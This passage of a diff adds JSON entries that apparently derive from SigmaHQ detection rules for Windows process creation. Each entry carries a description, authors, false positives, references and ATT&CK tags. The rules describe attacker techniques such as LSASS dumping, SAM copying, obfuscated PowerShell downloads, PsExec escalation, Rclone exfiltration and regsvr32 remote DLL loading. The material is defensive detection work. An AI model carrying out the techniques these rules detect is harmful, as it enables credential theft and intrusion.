"logsource.product": "windows", + "refs": [ + "https://twitter.com/PythonResponder/status/1385064506049630211", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_getprocess_lsass.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1552.004" + ] + }, + "uuid": "b2815d0d-7481-4bf0-9b6c-a4c48a94b349", + "value": "PowerShell Get-Process LSASS" + }, + { + "description": "Detects base64 encoded strings used in hidden malicious PowerShell command lines", + "meta": { + "author": "John Lambert (rule)", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_hidden_b64_cmd.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "http://www.leeholmes.com/blog/2017/09/21/searching-for-content-in-base-64-strings/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_hidden_b64_cmd.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "f26c6093-6f14-4b12-800f-0fcb46f5ffd0", + "value": "Malicious Base64 Encoded PowerShell Keywords in Command Lines" + }, + { + "description": "Detects suspicious ways to run Invoke-Execution using IEX acronym", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/03/24", + "falsepositive": [ + "Legitimate scripts that use IEX" + ], + "filename": "proc_creation_win_susp_powershell_iex_patterns.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/invoke-expression?view=powershell-7.2", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_iex_patterns.yml" + ], + "tags": "No established tags" + }, + "uuid": "09576804-7a05-458e-a817-eb718ca91f54", + "value": "Suspicious PowerShell IEX Execution Patterns" + }, + { + "description": "Detects suspicious powershell invocations from interpreters or unusual programs", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/01/16", + "falsepositive": [ + "Microsoft Operations Manager (MOM)", + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_parent_combo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.carbonblack.com/2017/03/15/attackers-leverage-excel-powershell-dns-latest-non-malware-attack/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_combo.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "95eadcb2-92e4-4ed1-9031-92547773a6db", + "value": "Suspicious PowerShell Invocation Based on Parent Process" + }, + { + "description": "Detects a suspicious parents of powershell.exe", + "meta": { + "author": "Teymur Kheirkhabarov, Harish Segar (rule)", + "creation_date": "2020/03/20", + "falsepositive": [ + "Other scripts" + ], + "filename": "proc_creation_win_susp_powershell_parent_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=26", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_parent_process.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "754ed792-634f-40ae-b3bc-e0448d33f695", + "value": "Suspicious PowerShell Parent Process" + }, + { + "description": "Detects suspicious PowerShell scripts accessing SAM hives", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/07/29", + "falsepositive": [ + "Some rare backup scenarios", + "PowerShell scripts fixing HiveNightmare / SeriousSAM ACLs" + ], + "filename": "proc_creation_win_susp_powershell_sam_access.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/splinter_code/status/1420546784250769408", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sam_access.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.002" + ] + }, + "uuid": "1af57a4b-460a-4738-9034-db68b880c665", + "value": "PowerShell SAM Copy" + }, + { + "description": "Detects suspicious sub processes spawned by PowerShell", + "meta": { + "author": "Florian Roth, Tim Shelton", + "creation_date": "2022/04/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_sub_processes.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/ankit_anubhav/status/1518835408502620162", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_sub_processes.yml" + ], + "tags": "No established tags" + }, + "uuid": "e4b6d2a7-d8a4-4f19-acbd-943c16d90647", + "value": "Suspicious PowerShell Sub Processes" + }, + { + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. nEt.WEbCliEnT) string as used in obfuscation techniques", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/05/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_powershell_webclient_casing.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/b9040c63-c140-479b-ad59-f1bb56ce7a97/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_powershell_webclient_casing.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "value": "Net WebClient Casing Anomalies" + }, + { + "description": "Detects a certain command line flag combination used by Microsoft.NodejsTools.PressAnyKey.exe that can be used to execute any other binary", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "Other tools with the same command line flag combination", + "Legitimate uses as part of Visual Studio development" + ], + "filename": "proc_creation_win_susp_pressynkey_lolbin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1463526834918854661", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_pressynkey_lolbin.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "a20391f8-76fb-437b-abc0-dba2df1952c6", + "value": "NodejsTools PressAnyKey Lolbin" + }, + { + "description": "Attackers can use print.exe for remote file copy", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative", + "creation_date": "2020/10/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_print.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Print/", + "https://twitter.com/Oddvarmoe/status/985518877076541440", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_print.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "bafac3d6-7de9-4dd9-8874-4a1194b493ed", + "value": "Abusing Print Executable" + }, + { + "description": "Detects suspicious uses of the SysInternals Procdump utility by using a special command line parameter in combination with the lsass.exe process. This way we're also able to catch cases in which the attacker has renamed the procdump executable.", + "meta": { + "author": "Florian Roth", + "creation_date": "2018/10/30", + "falsepositive": [ + "Unlikely, because no one should dump an lsass process memory", + "Another tool that uses the command line switches of Procdump" + ], + "filename": "proc_creation_win_susp_procdump_lsass.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "Internal Research", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_procdump_lsass.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1036", + "attack.credential_access", + "attack.t1003.001", + "car.2013-05-009" + ] + }, + "uuid": "5afee48e-67dd-4e03-a783-f74259dcf998", + "value": "Suspicious Use of Procdump on LSASS" + }, + { + "description": "Detects suspicious use of Process Hacker and its newer version named System Informer, a tool to view and manipulate processes, kernel options and other low level stuff", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/10/10", + "falsepositive": [ + "Sometimes used by developers or system administrators for debugging purposes" + ], + "filename": "proc_creation_win_susp_process_hacker.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://processhacker.sourceforge.io/", + "https://github.com/winsiderss/systeminformer", + "https://www.crowdstrike.com/blog/falcon-overwatch-report-finds-increase-in-ecrime/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_process_hacker.yml" + ], + "tags": "No established tags" + }, + "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", + "value": "Process Hacker / System Informer Usage" + }, + { + "description": "Detects suspicious patterns in program names or folders that are often found in malicious samples or hacktools", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/11", + "falsepositive": [ + "Legitimate tools that accidentally match on the searched patterns" + ], + "filename": "proc_creation_win_susp_progname.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_progname.yml" + ], + "tags": "No established tags" + }, + "uuid": "efdd8dd5-cee8-4e59-9390-7d4d5e4dd6f6", + "value": "Suspicious Program Names" + }, + { + "description": "Detects user accept agreement execution in psexec commandline", + "meta": { + "author": "omkar72", + "creation_date": "2020/10/30", + "falsepositive": [ + "Administrative scripts." + ], + "filename": "proc_creation_win_susp_psexec_eula.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexec_eula.yml" + ], + "tags": [ + "attack.execution", + "attack.t1569", + "attack.t1021" + ] + }, + "uuid": "730fc21b-eaff-474b-ad23-90fd265d4988", + "value": "Psexec Accepteula Condition" + }, + { + "description": "Detects launch of the PSEXESVC service, which means that this system was the target of a psexec remote execution", + "meta": { + "author": "Romaissa Adjailia, FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "fdfcbd78-48f1-4a4b-90ac-d82241e368c5", + "value": "PsExec Service Execution" + }, + { + "description": "Detects suspicious launch of the PSEXESVC service on this system and a sub process run as LOCAL_SYSTEM (-s), which means that someone remotely started a command on this system running it with highest privileges and not only the privileges of the login user account (e.g. the administrator account)", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc_as_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_as_system.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "7c0dcd3d-acf8-4f71-9570-f448b0034f94", + "value": "PsExec Service Execution as LOCAL SYSTEM" + }, + { + "description": "Detects suspicious launch of a renamed version of the PSEXESVC service with, which is not often used by legitimate administrators", + "meta": { + "author": "FLorian Roth", + "creation_date": "2022/07/21", + "falsepositive": [ + "Legitimate administrative tasks" + ], + "filename": "proc_creation_win_susp_psexesvc_renamed.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.youtube.com/watch?v=ro2QuZTIMBM", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexesvc_renamed.yml" + ], + "tags": [ + "attack.execution" + ] + }, + "uuid": "51ae86a2-e2e1-4097-ad85-c46cb6851de4", + "value": "Renamed PsExec Service Execution" + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec to escalate a command line to LOCAL_SYSTEM rights", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/11/23", + "falsepositive": [ + "Admins that use PsExec or PAExec to escalate to the SYSTEM account for maintenance purposes (rare)" + ], + "filename": "proc_creation_win_susp_psexex_paexec_escalate_system.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_escalate_system.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "8834e2f7-6b4b-4f09-8906-d2276470ee23", + "value": "PsExec/PAExec Escalation to LOCAL SYSTEM" + }, + { + "description": "Detects suspicious flags used by PsExec and PAExec but no usual program name in command line", + "meta": { + "author": "Florian Roth, Nasreddine Bencherchali", + "creation_date": "2021/05/22", + "falsepositive": [ + "Weird admins that rename their tools", + "Software companies that bundle PsExec/PAExec with their software and rename it, so that it is less embarrassing" + ], + "filename": "proc_creation_win_susp_psexex_paexec_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/sysinternals/downloads/psexec", + "https://www.poweradmin.com/paexec/", + "https://www.fireeye.com/blog/threat-research/2020/10/kegtap-and-singlemalt-with-a-ransomware-chaser.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psexex_paexec_flags.yml" + ], + "tags": [ + "attack.resource_development", + "attack.t1587.001" + ] + }, + "uuid": "207b0396-3689-42d9-8399-4222658efc99", + "value": "PsExec/PAExec Flags" + }, + { + "description": "Threat actors can use the PsLogList utility to dump event log in order to extract admin accounts and perform account discovery.", + "meta": { + "author": "Nasreddine Bencherchali @nas_bench", + "creation_date": "2021/12/18", + "falsepositive": [ + "Another tool that uses the command line switches of PsLogList", + "Legitimate use of PsLogList by an administrator" + ], + "filename": "proc_creation_win_susp_psloglist.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/01/12/abusing-cloud-services-to-fly-under-the-radar/", + "https://www.cybereason.com/blog/deadringer-exposing-chinese-threat-actors-targeting-major-telcos", + "https://github.com/3CORESec/MAL-CL/tree/master/Descriptors/Sysinternals/PsLogList", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psloglist.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1087.001", + "attack.t1087.002" + ] + }, + "uuid": "aae1243f-d8af-40d8-ab20-33fc6d0c55bc", + "value": "Suspicious Use of PsLogList" + }, + { + "description": "The psr.exe captures desktop screenshots and saves them on the local machine", + "meta": { + "author": "Beyu Denis, oscd.community", + "creation_date": "2019/10/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_psr_capture_screenshots.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Psr/", + "https://www.sans.org/summit-archives/file/summit-archive-1493861893.pdf", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_psr_capture_screenshots.yml" + ], + "tags": [ + "attack.collection", + "attack.t1113" + ] + }, + "uuid": "2158f96f-43c2-43cb-952a-ab4580f32382", + "value": "Psr.exe Capture Screenshots" + }, + { + "description": "Detects a suspicious command line execution that invokes PowerShell with reference to an AppData folder", + "meta": { + "author": "Florian Roth, Jonhnathan Ribeiro, oscd.community", + "creation_date": "2019/01/09", + "falsepositive": [ + "Administrative scripts" + ], + "filename": "proc_creation_win_susp_ps_appdata.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/JohnLaTwC/status/1082851155481288706", + "https://app.any.run/tasks/f87f1c4e-47e2-4c46-9cf4-31454c06ce03", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_appdata.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001" + ] + }, + "uuid": "ac175779-025a-4f12-98b0-acdaeb77ea85", + "value": "PowerShell Script Run in AppData" + }, + { + "description": "Detects the execution of powershell, a WebClient object creation and the invocation of DownloadFile in a single command line", + "meta": { + "author": "Florian Roth", + "creation_date": "2020/08/28", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ps_downloadfile.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://www.fireeye.com/blog/threat-research/2020/03/apt41-initiates-global-intrusion-campaign-using-multiple-exploits.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_downloadfile.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059.001", + "attack.command_and_control", + "attack.t1104", + "attack.t1105" + ] + }, + "uuid": "8f70ac5f-1f6f-4f8e-b454-db19561216c5", + "value": "PowerShell DownloadFile" + }, + { + "description": "Detects suspicious UTF16 and base64 encoded and often obfuscated PowerShell code often used in command lines", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/07/11", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_ps_encoded_obfusc.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://app.any.run/tasks/fcadca91-3580-4ede-aff4-4d2bf809bf99/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_ps_encoded_obfusc.yml" + ], + "tags": [ + "attack.defense_evasion" + ] + }, + "uuid": "8d01b53f-456f-48ee-90f6-bc28e67d4e35", + "value": "Suspicious PowerShell Obfuscated PowerShell Code" + }, + { + "description": "An adversary may use Radmin Viewer Utility to remotely control Windows device", + "meta": { + "author": "frack113", + "creation_date": "2022/01/22", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_radmin.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1072/T1072.md", + "https://www.radmin.fr/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_radmin.yml" + ], + "tags": [ + "attack.execution", + "attack.lateral_movement", + "attack.t1072" + ] + }, + "uuid": "5817e76f-4804-41e6-8f1d-5fa0b3ecae2d", + "value": "Use Radmin Viewer Utility" + }, + { + "description": "Detects the use of rar.exe, on the command line, to create an archive with password protection or with a specific compression level. This is pretty indicative of malicious actions.", + "meta": { + "author": "@ROxPinTeddy", + "creation_date": "2020/05/12", + "falsepositive": [ + "Legitimate use of Winrar command line version", + "Other command line tools, that use these flags" + ], + "filename": "proc_creation_win_susp_rar_flags.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://labs.sentinelone.com/the-anatomy-of-an-apt-attack-and-cobaltstrike-beacons-encoded-configuration/", + "https://ss64.com/bash/rar.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1560.001/T1560.001.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rar_flags.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "uuid": "faa48cae-6b25-4f00-a094-08947fef582f", + "value": "Rar Usage with Password and Compression Level" + }, + { + "description": "Detects suspicious process related to rasdial.exe", + "meta": { + "author": "juju4", + "creation_date": "2019/01/16", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_rasdial_activity.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/subTee/status/891298217907830785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rasdial_activity.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "6bba49bf-7f8c-47d6-a1bb-6b4dece4640e", + "value": "Suspicious RASdial Activity" + }, + { + "description": "Detects a explorer.exe sub process of the RazerInstaller software which can be invoked from the installer to select a different installation folder but can also be exploited to escalate privileges to LOCAL SYSTEM", + "meta": { + "author": "Florian Roth, Maxime Thiebaut", + "creation_date": "2021/08/23", + "falsepositive": [ + "User selecting a different installation folder (check for other sub processes of this explorer.exe process)" + ], + "filename": "proc_creation_win_susp_razorinstaller_explorer.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/j0nh4t/status/1429049506021138437", + "https://streamable.com/q2dsji", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_razorinstaller_explorer.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1553" + ] + }, + "uuid": "a4eaf250-7dc1-4842-862a-5e71cd59a167", + "value": "Suspicious RazerInstaller Explorer Subprocess" + }, + { + "description": "Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc", + "meta": { + "author": "Bhabesh Raj, Sittikorn S, Aaron Greetham (@beardofbinary) - NCC Group", + "creation_date": "2021/05/10", + "falsepositive": [ + "Legitimate RClone use" + ], + "filename": "proc_creation_win_susp_rclone_execution.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/", + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware", + "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-126a", + "https://labs.sentinelone.com/egregor-raas-continues-the-chaos-with-cobalt-strike-and-rclone", + "https://www.splunk.com/en_us/blog/security/darkside-ransomware-splunk-threat-update-and-detections.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_rclone_execution.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567.002" + ] + }, + "uuid": "e37db05d-d1f9-49c8-b464-cee1a4b11638", + "value": "Rclone Execution via Command Line or PowerShell" + }, + { + "description": "Once established within a system or network, an adversary may use automated techniques for collecting internal data.", + "meta": { + "author": "frack113", + "creation_date": "2021/07/30", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_recon.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1119/T1119.md", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon.yml" + ], + "tags": [ + "attack.collection", + "attack.t1119" + ] + }, + "uuid": "aa2efee7-34dd-446e-8a37-40790a66efd7", + "value": "Recon Information for Export with Command Prompt" + }, + { + "description": "Detects a set of suspicious network related commands often used in recon stages", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/02/07", + "falsepositive": [ + "False positives depend on scripts and administrative tools used in the monitored environment" + ], + "filename": "proc_creation_win_susp_recon_network_activity.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2022/02/07/qbot-likes-to-move-it-move-it/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_recon_network_activity.yml" + ], + "tags": [ + "attack.discovery", + "attack.t1087", + "attack.t1082", + "car.2016-03-001" + ] + }, + "uuid": "e6313acd-208c-44fc-a0ff-db85d572e90e", + "value": "Network Reconnaissance Activity" + }, + { + "description": "Detects a regedit started with TrustedInstaller privileges or by ProcessHacker.exe", + "meta": { + "author": "Florian Roth", + "creation_date": "2021/05/27", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_susp_regedit_trustedinstaller.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/1kwpeter/status/1397816101455765504", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regedit_trustedinstaller.yml" + ], + "tags": [ + "attack.privilege_escalation", + "attack.t1548" + ] + }, + "uuid": "883835a7-df45-43e4-bf1d-4268768afda4", + "value": "Regedit as Trusted Installer" + }, + { + "description": "Detects using register-cimprovider.exe to execute arbitrary dll file.", + "meta": { + "author": "Ivan Dyachkov, Yulia Fomina, oscd.community", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_register_cimprovider.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/PhilipTsukerman/status/992021361106268161", + "https://lolbas-project.github.io/lolbas/Binaries/Register-cimprovider/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_register_cimprovider.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574" + ] + }, + "uuid": "a2910908-e86f-4687-aeba-76a5f996e652", + "value": "DLL Execution Via Register-cimprovider.exe" + }, + { + "description": "Detects when the registration of a VSS/VDS Provider as a COM+ application.", + "meta": { + "author": "Austin Songer @austinsonger", + "creation_date": "2021/11/05", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_registration_via_cscript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sblmsrsn/status/1456613494783160325?s=20", + "https://ss64.com/vb/cscript.html", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_registration_via_cscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "28c8f68b-098d-45af-8d43-8089f3e35403", + "value": "Suspicious Registration via cscript.exe" + }, + { + "description": "Detects various anomalies in relation to regsvr32.exe", + "meta": { + "author": "Florian Roth, oscd.community, Tim Shelton", + "creation_date": "2019/01/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_anomalies.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://subt0x10.blogspot.de/2017/04/bypass-application-whitelisting-script.html", + "https://app.any.run/tasks/34221348-072d-4b70-93f3-aa71f6ebecad/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010", + "car.2019-04-002", + "car.2019-04-003" + ] + }, + "uuid": "8e2b24c9-4add-46a0-b4bb-0057b4e6187d", + "value": "Regsvr32 Anomaly" + }, + { + "description": "Detects a flag anomaly in which regsvr32.exe uses a /i flag without using a /n flag at the same time", + "meta": { + "author": "Florian Roth", + "creation_date": "2019/07/13", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_flags_anomaly.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/sbousseaden/status/1282441816986484737?s=12", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_flags_anomaly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "b236190c-1c61-41e9-84b3-3fe03f6d76b0", + "value": "Regsvr32 Flags Anomaly" + }, + { + "description": "Detects a certain command line flag combination used by regsvr32 when used to download and register a DLL from a remote address which uses HTTP (not HTTPS) and a IP address and not FQDN", + "meta": { + "author": "Florian Roth", + "creation_date": "2022/01/11", + "falsepositive": [ + "FQDNs that start with a number" + ], + "filename": "proc_creation_win_susp_regsvr32_http_pattern.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1461041276514623491c19-ps", + "https://twitter.com/tccontre18/status/1480950986650832903", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_http_pattern.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218.010" + ] + }, + "uuid": "2dd2c217-bf68-437a-b57c-fe9fd01d5de8", + "value": "Suspicious Regsvr32 HTTP IP Pattern" + }, + { + "description": "Detects execution of REGSVR32.exe with DLL masquerading as image files", + "meta": { + "author": "frack113", + "creation_date": "2021/11/29", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_susp_regsvr32_image.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/11/29/continuing-the-bazar-ransomware-story/", + "https://blog.talosintelligence.com/2021/10/threat-hunting-in-large-datasets-by.html", + "https://guides.lib.umich.edu/c.php?g=282942&p=1885348", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_regsvr32_image.yml" + ], + "tags": [ + 